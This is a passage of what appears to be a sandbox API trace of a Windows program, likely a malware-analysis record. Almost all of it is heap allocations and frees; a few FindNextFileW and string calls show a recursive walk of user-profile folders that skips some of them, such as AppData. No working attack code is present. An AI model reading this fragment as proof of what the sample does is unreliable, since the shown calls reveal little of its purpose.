lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764cc0 | out: hHeap=0x650000) returned 1 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0074.161] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0074.161] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0074.161] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0074.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0074.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.161] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x11a0079, ftCreationTime.dwLowDateTime=0xc2e5f, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0xf8007a, nFileSizeHigh=0xc2e5f, nFileSizeLow=0x76a988, dwReserved0=0x10, dwReserved1=0x657690, cFileName="ዠⴞ\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2b8 [0074.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0074.161] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b20 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0074.162] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.162] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0074.162] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.162] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.162] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.162] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b2b8 [0074.162] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b378 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a78 | out: hHeap=0x650000) returned 1 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0074.162] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.162] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.162] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0074.162] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0074.162] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.162] FindClose (in: hFindFile=0x6b8a38 | out: hFindFile=0x6b8a38) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0074.163] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b810 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a6d0 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a778 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b90 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2a0 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b80 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a50 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b288 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1f8 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b70 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dce8 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0074.163] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ab0 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b210 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a988 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a958 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ae0 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8f8 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a868 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690af0 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7c0 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b00 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a90 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690aa0 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a80 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a70 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b30 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9e8 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9970 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa00 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9b8 | out: hHeap=0x650000) returned 1 [0074.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa60 | out: hHeap=0x650000) returned 1 [0074.165] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8e0 | out: hHeap=0x650000) returned 1 [0074.165] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0074.165] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0074.176] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a30 [0074.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0074.176] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a30 [0074.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0074.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8e0 [0074.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b30 [0074.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b30 | out: hHeap=0x650000) returned 1 [0074.176] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0074.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa60 [0074.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0074.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b30 [0074.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8e0 | out: hHeap=0x650000) returned 1 [0074.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0074.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0074.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0074.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b30 | out: hHeap=0x650000) returned 1 [0074.176] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa60 | out: hHeap=0x650000) returned 1 [0074.176] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.176] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b30 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a30 [0074.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0074.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b30 | out: hHeap=0x650000) returned 1 [0074.177] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b30 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a30 [0074.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0074.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b30 | out: hHeap=0x650000) returned 1 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0074.177] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b30 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a30 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a70 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a80 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690aa0 [0074.177] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.177] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0074.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690aa0 | out: hHeap=0x650000) returned 1 [0074.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0074.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690aa0 [0074.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0074.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa60 [0074.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a90 [0074.178] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8e0 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0074.178] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ab0 | out: hHeap=0x650000) returned 1 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0074.178] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b70 | out: hHeap=0x650000) returned 1 [0074.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Favorites", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9e8 | out: hHeap=0x650000) returned 1 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7c0 | out: hHeap=0x650000) returned 1 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ab0 | out: hHeap=0x650000) returned 1 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0074.178] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a38 | out: hHeap=0x650000) returned 1 [0074.178] PeekMessageW (in: lpMsg=0x61e72c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e72c) returned 0 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b810 | out: hHeap=0x650000) returned 1 [0074.178] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690af0 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b00 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa00 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ae0 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9b8 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690aa0 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a90 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa60 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8e0 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a80 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a70 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b30 | out: hHeap=0x650000) returned 1 [0074.179] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0074.179] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b30 | out: hHeap=0x650000) returned 1 [0074.179] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a80 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a70 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690af0 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b00 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a868 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b210 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b210 | out: hHeap=0x650000) returned 1 [0074.180] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 